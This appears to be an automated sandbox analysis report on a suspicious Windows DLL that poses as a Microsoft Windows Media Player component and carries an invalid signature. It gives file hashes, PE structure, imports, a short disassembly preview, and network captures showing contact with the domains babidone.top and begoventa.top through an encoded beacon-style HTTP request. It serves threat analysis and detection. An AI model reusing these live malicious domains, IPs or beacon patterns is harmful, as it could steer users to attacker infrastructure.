SHA1:	EFA859B3E2CAFE2EEB0528E5C37CE94337C03C06
SHA-256:	523DA11F99BDC035433B7AD42642F058492A4E63ED357D193839809F8D560A4F
SHA-512:	0EA6C157FAF1C9484A69C107E1BA43E1388BFCA3E55C93B8572E1DF6EB17B76BAF9350215504A931C6C8DD652C6743F722187FBF08031CC05559DCEA800EA86E
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBDDB979C06B382E7.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40568636521364454
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loEDS9loEDC9lWEDg2oIrXR+IIrXSIF3:kBqoIwOoDrwrn
MD5:	467079A72B9542080A17D7020CEA1EA5
SHA1:	C6C24309BE84C5C36B8C154C37B4399C30FEA861
SHA-256:	B6CEF05D56E0CF94B3747781D495F1B81F445F23B4A1E12848350175554FBBC3
SHA-512:	A7B1D3E1E3480EF7BFD6A11E2D6CD923DA3418D7747D3126D9A5A7189DAD453E77D13200A831F263AFA319C17E89B76077644B4BF37B80E04EDFCD34EAE7039F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD4CA446EF33C2D57.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39617
Entropy (8bit):	0.5661717333321002
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+EiIZCUxboMYxboMgxboMR:kBqoxKAuqR+EiIZCUxbonxboTxbo4
MD5:	F3F63A0DA97DF0202CBE6FB587020099
SHA1:	28EF2148B441B85BE2DDC9FBDC0EAE7233E710DC
SHA-256:	22516C1B3F3F5028D7364B248D4FDF1924FAA1BA29CF4AEEC7A1131F4E38EF4D
SHA-512:	8A9B7438433A8D15C282099A65EF4E4947E688F6F06E39D3F9CD61B69F69282346F660D14E04E731333C09C297E6705E97A1DA58441C1F49D114D4A02449A335
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFDF7FEAB4721FD8E2.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5736007353148195
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+IOEV+Qejcp5ejcpNejcpy:kBqoxKAuqR+IOEV+Qewp5ewpNewpy
MD5:	1D852009F05DA7DF995E7535A4709495
SHA1:	018E6040EE0A99AE26B2141A577BDBBD8C0D8A70
SHA-256:	BA91F56D73CEFF88360862E08E54FF1B190BB918B4F25156BEF682CD061769B2
SHA-512:	34D754E5B46105510EEBF07005BA34F355A31C93BBF5B1878C55468507DA45E8B855995E6350528E49AB970ED1EFD2CBE8023DD5481C23378398384094C34184
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF6F6BADDE9A18747.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40633329185700595
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loyfS9loyfC9lWyf2fQfFfzfQf2YHfxf3:kBqoIys3
MD5:	7C0D373B4B13410A8135BC0B8DCCDCC0
SHA1:	B59FD3076421306B8C71FCDF0112BCA3051C0F2A
SHA-256:	F0D3ADAF55E47D21B0C9675965A8C0BEED1BA4BE1979C573A14E5EFBD66210C0
SHA-512:	CE629A4BFAD6597BA4695A5270E25DAFA25618B1A7E0C733822E07CDB507634A704228DA859D7F1BA56C6084F252C54EA67C3A5293CE1391496DA666AA802677
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	3.911923467563189
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.39% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00%
File name:	OgQJzDbLce.dll
File size:	313176
MD5:	5268c190b3a6940bc7c8f0361f3a187f
SHA1:	56b1b5066f88e07f494e5e97f9a8b791cc9d7bd2
SHA256:	8e34c697b603788b9baeecfb375c466cb8468a322d6ae9b81fc41fb61472c3da
SHA512:	c44274ee84f9fdfdce444b36e33b2ca2db265cbc99a9ffb7fe5ebbbc79cb9b82f19cb93477d4211d9122cd7043a5964c115d2bc4adc4af0ef7c0b60b069481d0
SSDEEP:	1536:34UeRdT1u9JFuuhY03X67MMOo+xT0/7Hbo5ioQ+pQ:IUe2aW6CKE5rQ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[._...........!...2.............................................................4.....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1002f010
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5FFC5BBD [Mon Jan 11 14:07:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	302dc27ee8fb51d51fd455c5c954a121

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=XFYFPUHYTZABTVZNTR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	1/11/2021 12:21:35 AM 1/1/2040 12:59:59 AM
Subject Chain	CN=XFYFPUHYTZABTVZNTR
Version:	3
Thumbprint MD5:	BB4518AF652AB34118DB294048EC2292
Thumbprint SHA-1:	C0D055129F95529EA2B2D89554BF80520281570D
Thumbprint SHA-256:	22031A72E03D309F0C1E229440904D068D6D8F87D2CDE4DC11EC76DE301B9DA3
Serial:	5D3EDE33956CF3B547584EF32177B187

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 50h
mov dword ptr [ebp-08h], 00000001h
mov dword ptr [ebp-04h], 00000000h
mov eax, ebp
mov ecx, dword ptr [eax+08h]
mov dword ptr [1004B4C0h], ecx
mov dword ptr [1004B4A0h], ebp
mov dword ptr [ebp-10h], 00000001h
mov dword ptr [ebp-14h], 00000001h
mov dword ptr [ebp-18h], 00000001h
mov dword ptr [ebp-0Ch], 00000001h
mov eax, dword ptr [ebp-18h]
push eax
call dword ptr [1004AB44h]
mov dword ptr [ebp-34h], 00000001h
mov dword ptr [ebp-3Ch], 00000001h
mov dword ptr [ebp-4Ch], 00000001h
mov dword ptr [ebp-24h], 00000001h
mov dword ptr [ebp-30h], 00000001h
mov dword ptr [ebp-38h], 00000001h
mov dword ptr [ebp-48h], 00000001h
mov dword ptr [ebp-20h], 00000001h
mov dword ptr [ebp-2Ch], 00000001h
mov dword ptr [ebp-40h], 00000001h
mov dword ptr [ebp-28h], 00000001h
mov dword ptr [ebp-44h], 00000001h
mov dword ptr [ebp-1Ch], 00000001h
mov ecx, dword ptr [ebp-24h]
push ecx
call dword ptr [1004AB18h]
mov edx, dword ptr [ebp-1Ch]
add edx, 33h
mov dword ptr [ebp-1Ch], edx
mov eax, dword ptr [ebp-24h]
push eax
call dword ptr [1004AB18h]
mov ecx, dword ptr [ebp-1Ch]
add ecx, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4a76c	0xa0	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4c000	0x11a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4b200	0x1558
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4e000	0x398	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4a9fc	0x1f0	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2fe9f	0x30000	False	0.279159545898	data	4.882308777	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data2	0x31000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x32000	0x1951c	0x19600	False	0.0185691194581	data	0.340193889812	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x4c000	0x11a8	0x1200	False	0.394314236111	data	4.62126050947	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4e000	0x398	0x400	False	0.8388671875	data	6.25576957826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x4c158	0x17c	ASCII text, with CRLF line terminators	English	United States
TYPELIB	0x4c2d4	0x708	data	English	United States
RT_RCDATA	0x4c9dc	0x410	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States
RT_VERSION	0x4cdec	0x3bc	data	English	United States

Imports

DLL	Import
KERNEL32.dll	QueryPerformanceFrequency, GetDateFormatW, ResetEvent, QueryPerformanceCounter, SetEvent, GetCurrentProcess, OpenEventW, ResumeThread, WaitForSingleObject, DuplicateHandle, WriteFile, GetLastError, GetExitCodeThread, CreateFileW, MoveFileW, lstrlenA, ReadFile, Sleep, GetFileSize, CreateEventW, GetLocaleInfoW, CloseHandle, GetLocalTime, LoadLibraryW, GetWindowsDirectoryW, FormatMessageW, CreateProcessW, LocalFree, FindFirstFileW, CopyFileW, FindClose, SetLastError, CreateDirectoryW, lstrlenW, GetSystemDirectoryW, GetTempPathW, GetDriveTypeW, GetFileTime, GetUserDefaultLCID, ExpandEnvironmentStringsW, GetPrivateProfileStringW, GetFileInformationByHandle, GetFileAttributesA, FileTimeToDosDateTime, GetSystemInfo, CreateFileA, WideCharToMultiByte, FileTimeToLocalFileTime, lstrcmpiW, GetTempFileNameW, GetFileAttributesW, GetProcAddress, LocalAlloc, GetModuleHandleW, GetStartupInfoW, DeleteFileW, ExitProcess, GetTickCount, LoadLibraryA, MultiByteToWideChar, FreeLibrary, GetModuleHandleA, GetStdHandle, GetConsoleScreenBufferInfo, VirtualAlloc, HeapFree, GetProcessHeap, HeapAlloc, VirtualFree, SetConsoleCtrlHandler
USER32.dll	GetClipboardData, LoadIconW
GDI32.dll	GetKerningPairsA, CreateEllipticRgn, PATHOBJ_vEnumStartClipLines, GetBoundsRect, FONTOBJ_pfdg, GetDIBColorTable, SetTextCharacterExtra, GetTextFaceW, EndPage, GetColorSpace, RealizePalette
COMDLG32.dll	GetOpenFileNameW
ADVAPI32.dll	IsTextUnicode, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegEnumKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExW, RegDeleteKeyW, RegDeleteValueW, RegGetKeySecurity, RegOpenKeyW, RegSetKeySecurity, RegConnectRegistryW
SHELL32.dll	ExtractIconW, DragQueryFileAorW, SHBindToParent, DoEnvironmentSubstW, ExtractIconA, ShellExecuteA, SHCreateProcessAsUserW, SHPathPrepareForWriteW, SHPathPrepareForWriteA, SHIsFileAvailableOffline, ExtractAssociatedIconW, SHGetSpecialFolderPathA, ShellExecuteEx, DragAcceptFiles, ExtractAssociatedIconA
SHLWAPI.dll	StrChrIA, StrRChrIW, StrCmpNW, StrChrA

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	wmprph.exe
FileVersion	12.0.7600.16385 (win7_rtm.090713-1255)
CompanyName	Microsoft Corporation
ProductName	Microsoft Windows Operating System
ProductVersion	12.0.7600.16385
FileDescription	Windows Media Player Rich Preview Handler
OriginalFilename	wmprph.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 19:18:58.637449026 CET	49766	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:18:58.637895107 CET	49767	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:18:59.652379036 CET	49767	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:18:59.652384996 CET	49766	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:01.652669907 CET	49767	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:01.668169022 CET	49766	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:05.671752930 CET	49768	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:05.685636997 CET	49769	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:06.684380054 CET	49768	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:06.684417963 CET	49769	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:08.684454918 CET	49768	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:08.684526920 CET	49769	80	192.168.2.4	193.56.255.166
Jan 11, 2021 19:19:58.675662994 CET	49771	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:58.676135063 CET	49770	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:58.842180967 CET	80	49771	92.38.132.181	192.168.2.4
Jan 11, 2021 19:19:58.842485905 CET	80	49770	92.38.132.181	192.168.2.4
Jan 11, 2021 19:19:58.843215942 CET	49771	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:58.843277931 CET	49770	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:58.844620943 CET	49770	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:59.010343075 CET	80	49770	92.38.132.181	192.168.2.4
Jan 11, 2021 19:19:59.010474920 CET	49770	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:59.014595985 CET	49770	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:59.180378914 CET	80	49770	92.38.132.181	192.168.2.4
Jan 11, 2021 19:19:59.374355078 CET	49771	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:59.539839983 CET	80	49771	92.38.132.181	192.168.2.4
Jan 11, 2021 19:19:59.540218115 CET	49771	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:59.540604115 CET	49771	80	192.168.2.4	92.38.132.181
Jan 11, 2021 19:19:59.706584930 CET	80	49771	92.38.132.181	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 19:17:13.728465080 CET	52991	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:13.776426077 CET	53	52991	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:14.899044991 CET	53700	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:14.947060108 CET	53	53700	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:16.134349108 CET	51726	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:16.183490992 CET	53	51726	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:17.316296101 CET	56794	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:17.365488052 CET	53	56794	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:18.543859005 CET	56534	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:18.591643095 CET	53	56534	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:20.270620108 CET	56627	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:20.321528912 CET	53	56627	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:21.431942940 CET	56621	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:21.482697010 CET	53	56621	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:23.037543058 CET	63116	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:23.095849037 CET	53	63116	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:24.173182964 CET	64078	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:24.223839998 CET	53	64078	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:25.405437946 CET	64801	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:25.461977959 CET	53	64801	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:26.528758049 CET	61721	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:26.576582909 CET	53	61721	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:27.789350986 CET	51255	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:27.840101004 CET	53	51255	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:31.651175976 CET	61522	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:31.702140093 CET	53	61522	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:37.523211002 CET	52337	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:37.571157932 CET	53	52337	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:42.095158100 CET	55046	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:42.158015013 CET	53	55046	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:56.574376106 CET	49612	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:56.646744967 CET	53	49612	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:57.340466022 CET	49285	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:57.396816015 CET	53	49285	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:57.949260950 CET	50601	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:58.008524895 CET	53	50601	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:58.401261091 CET	60875	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:58.424139977 CET	56448	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:58.472059011 CET	53	60875	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:58.480787992 CET	53	56448	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:58.947978020 CET	59172	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:59.056448936 CET	53	59172	8.8.8.8	192.168.2.4
Jan 11, 2021 19:17:59.920516014 CET	62420	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:17:59.977058887 CET	53	62420	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:00.565299988 CET	60579	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:00.621866941 CET	53	60579	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:01.463937998 CET	50183	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:01.520250082 CET	53	50183	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:01.791364908 CET	61531	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:01.852602005 CET	53	61531	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:02.311281919 CET	49228	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:02.372957945 CET	53	49228	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:03.041776896 CET	59794	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:04.038800955 CET	59794	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:04.095683098 CET	53	59794	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:13.464627028 CET	55916	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:13.512702942 CET	53	55916	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:13.857961893 CET	52752	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:13.916877031 CET	53	52752	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:14.372106075 CET	60542	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:14.432737112 CET	53	60542	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:15.591245890 CET	60689	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:15.661892891 CET	53	60689	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:15.666835070 CET	64206	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:15.723268986 CET	53	64206	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:15.732852936 CET	50904	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:15.789099932 CET	53	50904	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:17.501837015 CET	57525	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:17.561764002 CET	53	57525	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:44.371268988 CET	53814	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:44.419553995 CET	53	53814	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:45.388396025 CET	53814	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:45.436148882 CET	53	53814	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:46.386667013 CET	53814	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:46.434607029 CET	53	53814	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:48.402055979 CET	53814	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:48.450495958 CET	53	53814	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:51.038003922 CET	53418	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:51.085899115 CET	53	53418	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:52.417939901 CET	53814	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:52.465867043 CET	53	53814	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:52.960946083 CET	62833	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:53.030009031 CET	53	62833	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:57.541655064 CET	59260	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:57.602686882 CET	53	59260	8.8.8.8	192.168.2.4
Jan 11, 2021 19:18:58.559163094 CET	49944	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:18:58.615565062 CET	53	49944	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:12.693413973 CET	63300	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:12.749691010 CET	53	63300	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:34.145577908 CET	61449	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:34.203614950 CET	53	61449	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:35.314510107 CET	51275	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:35.389287949 CET	53	51275	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:35.394572973 CET	63492	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:35.453552961 CET	53	63492	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:35.461821079 CET	58945	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:35.517985106 CET	53	58945	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:57.094701052 CET	60779	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:57.151117086 CET	53	60779	8.8.8.8	192.168.2.4
Jan 11, 2021 19:19:58.227552891 CET	64014	53	192.168.2.4	8.8.8.8
Jan 11, 2021 19:19:58.653007030 CET	53	64014	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 11, 2021 19:18:58.559163094 CET	192.168.2.4	8.8.8.8	0xdf0f	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)
Jan 11, 2021 19:19:12.693413973 CET	192.168.2.4	8.8.8.8	0x9d45	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)
Jan 11, 2021 19:19:58.227552891 CET	192.168.2.4	8.8.8.8	0xd523	Standard query (0)	begoventa.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 11, 2021 19:18:58.615565062 CET	8.8.8.8	192.168.2.4	0xdf0f	No error (0)	babidone.top	193.56.255.166	A (IP address)	IN (0x0001)
Jan 11, 2021 19:19:12.749691010 CET	8.8.8.8	192.168.2.4	0x9d45	No error (0)	babidone.top	193.56.255.166	A (IP address)	IN (0x0001)
Jan 11, 2021 19:19:58.653007030 CET	8.8.8.8	192.168.2.4	0xd523	No error (0)	begoventa.top	92.38.132.181	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

begoventa.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49770	92.38.132.181	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 11, 2021 19:19:58.844620943 CET	4752	OUT	GET /images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: begoventa.top Connection: Keep-Alive
Jan 11, 2021 19:19:59.010343075 CET	4752	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49771	92.38.132.181	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 11, 2021 19:19:59.374355078 CET	4752	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: begoventa.top Connection: Keep-Alive
Jan 11, 2021 19:19:59.539839983 CET	4753	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6140 Parent PID: 6032

General

Start time:	19:17:20
Start date:	11/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
